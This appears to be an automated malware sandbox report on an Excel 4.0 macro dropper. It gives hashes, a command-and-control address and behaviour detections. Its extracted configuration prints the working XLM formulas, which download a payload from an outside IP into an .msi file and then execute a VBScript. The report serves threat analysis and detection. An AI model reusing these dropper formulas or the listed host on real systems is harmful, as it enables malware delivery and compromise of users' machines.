General

  • Target

    016618c8148996000ee1d520a6604220

  • Size

    6KB

  • Sample

    231221-1j52esabf9

  • MD5

    016618c8148996000ee1d520a6604220

  • SHA1

    0a930b9c9030e9b8a6dfc700d7f2fdd7299c0ffc

  • SHA256

    f2df034bf7c2cc2cddc5205a69a057f48680e44fa59b042998a541bdd29e3887

  • SHA512

    d6718013ee24ae12bce876867ace088382648df85fb1588b881da9ea3b26c6c44b577170e21fc570c5de97b499d75131d8ca05741cc45c75129a967c3efc42e6

  • SSDEEP

    192:NDSvuSRbrA2OmmfRI8UhHFBFYumb98ygF+T:NcuuM2we1FYTb98ygO

Score
10/10
xlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://46.17.98.187/index.php

http://google.com/index.php

Attributes
  • formulas

    =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0)
    =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0)
    =EXEC("wscript C:\zer\spp.vbs")
    =HALT()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://46.17.98.187/index.php

xlm40.dropper

http://google.com/index.php

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://46.17.98.187/index.php

Targets

    • Target

      016618c8148996000ee1d520a6604220

    • Size

      6KB

    • MD5

      016618c8148996000ee1d520a6604220

    • SHA1

      0a930b9c9030e9b8a6dfc700d7f2fdd7299c0ffc

    • SHA256

      f2df034bf7c2cc2cddc5205a69a057f48680e44fa59b042998a541bdd29e3887

    • SHA512

      d6718013ee24ae12bce876867ace088382648df85fb1588b881da9ea3b26c6c44b577170e21fc570c5de97b499d75131d8ca05741cc45c75129a967c3efc42e6

    • SSDEEP

      192:NDSvuSRbrA2OmmfRI8UhHFBFYumb98ygF+T:NcuuM2we1FYTb98ygO

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Process spawned suspicious child process

      This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.
